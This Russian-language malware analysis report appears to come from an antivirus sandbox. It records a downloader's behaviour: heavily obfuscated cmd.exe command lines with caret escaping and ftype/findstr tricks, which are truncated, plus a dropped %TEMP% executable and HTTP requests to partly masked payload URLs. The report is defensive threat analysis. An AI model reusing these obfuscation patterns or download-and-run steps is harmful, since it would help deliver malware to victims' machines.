Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ^fO^r , , /^F ; " delims=fLp tokens= 1 " , ; %Q ; ^In ; ( , , ' ; ft^^yPe ; ^| , ^^finDs^^tR ; ; ^^cm ' , ) , d^O ; %Q, ; ; xhA35I^/^vn^h5j^Y] , ; Z84S/^c " ; , (sE...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\952.exe
Удаляет следующие файлы
- %TEMP%\952.exe
Сетевая активность
Подключается к
- 'hk##.com':80
- 'ec####esuits.com':80
- 'mr###ggs.com':80
- 'lg##b.co.uk':80
- 'lg##b.co.uk':443
TCP
Запросы HTTP GET
- http://hk##.com/file/hgWA2l/
- http://www.ec####esuits.com/oElikDNad/
- http://mr###ggs.com/J1fxBvdlL/
- http://lg##b.co.uk/MIaOipON/
Другие
- 'lg##b.co.uk':443
UDP
- DNS ASK hk##.com
- DNS ASK pa###as.com.br
- DNS ASK ec####esuits.com
- DNS ASK mr###ggs.com
- DNS ASK lg##b.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^fO^r , , /^F ; " delims=fLp tokens= 1 " , ; %Q ; ^In ; ( , , ' ; ft^^yPe ; ^| , ^^finDs^^tR ; ; ^^cm ' , ) , d^O ; %Q, ; ; xhA35I^/^vn^h5j^Y] , ; Z84S/^c " ; , (sE...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ft^yPe | ^finDs^tR ^cm
- '<SYSTEM32>\cmd.exe' /S /D /c" ftyPe "
- '<SYSTEM32>\findstr.exe' cm
- '<SYSTEM32>\cmd.exe' , ; ; xhA35I/vnh5jY] , ; Z84S/c " ; , (sE^t ^ ^ ^}{=p^@^ZMI$O1L^)s^\B^-Sk^=/C.l}y{5^q:cv^TN^g^'m^rU ^xRji^YD^(+now^F^ef^J^Q^E^;^2^thub9dA,aWP)& , ; ^for ; %^e , , ^iN ; (^ -0 , +46...
